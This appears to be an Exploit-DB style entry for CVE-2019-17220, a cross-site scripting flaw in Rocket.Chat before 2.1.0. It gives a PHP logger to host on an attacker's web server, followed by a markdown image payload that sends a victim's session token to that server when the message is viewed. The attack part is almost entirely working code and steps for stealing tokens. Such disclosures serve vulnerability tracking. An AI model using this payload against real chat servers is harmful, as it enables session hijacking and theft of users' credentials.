As I found out, the service has a security problem that will lead to the disclosure of user information.
Packet Storm
Mitre CVE
NIST
Exploit-DB
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | # Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat < 2.1.0 # CVE: CVE-2019-17220 # Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp) 1. Create l33t.php on a web server <?php $output = fopen("logs.txt", "a+") or die("WTF? o.O"); $leet = $_GET['leet']."\n\n"; fwrite($output, $leet); fclose($output); ?> 2. Open a chat session 3. Send payload with your web server url ![title](http://10.10.1.5/l33t.php?leet=+`{}token`) 4. Token will be written in logs.txt when target seen your message. |